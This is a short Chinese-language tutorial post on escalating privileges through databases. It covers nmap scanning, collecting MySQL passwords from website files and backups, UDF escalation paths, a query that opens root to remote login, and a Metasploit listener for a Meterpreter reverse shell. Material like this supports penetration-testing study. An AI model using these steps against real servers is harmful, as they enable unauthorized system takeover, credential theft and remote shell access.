权限提升-数据库提权
在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数据库提权的可能。 数据库应用提权在权限提升中的意义
- WEB 或本地环境如何探针数据库应用(只需要数据库的密码)
- 数据库提权权限用户密码收集等方法(配置文件、存储文件、暴力猜解、其它方式)
- 目前数据库提权对应的技术及方法等(MySQL,Mssql)
Mysql 数据库提权演示-脚本&MSF
端口服务探针
namp探测主机操作系统、端口服务,版本信息
nmap -sV -O 192.168.50.58
信息收集,通过在网站目录中查找文件内容,获取到数据库的密码
当然,也可以读取备份文件(通过访问IP获得根目录下的网站备份源码,但是你要获取到源码的名字才行,这里可以通过御剑扫描)
也可以通过查看数据库文件获取到相关信息
查看数据库表文件可以获取到对应的表内的内容
也可以获取到数据库的用户的密码信息
提权利用-UDF提权
已知当前MySQL版本为5.5.53
- mysql<5.1 导出目录
c:/windows
或c:/windows/System32
- mysql=>5.1 导出安装目录
/lib/plugin
- 根据结果,导入文件地址为
C:/phpStudy/PHPTutorial/MySQL/lib/plugin
,如果不存在就创建
进行文件注入,有个前提,需要有
secure_file_priv
- 默认情况下会写入文件失败,mysql的文件写入权限问题,修改这个参数,不能在控制台修改,必须修改配置文件才可以
MSF生成后门进行
需要让数据库用户可以远程访问
#完成命令以后进行重启
update mysql.user set host='%' where user='root';
flush privileges;
成功执行,并留下了文件,只要重启服务器就会执行
- 这个需要有
secure_file_priv
参数,并且是操作系统是windows,否则文件写入会失败
msf监听端口,获取到会话
#进入监听模块
use exploit/multi/handler
#设置payload反弹
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
show options
run
最后一次更新于2022-04-24 10:48
0 条评论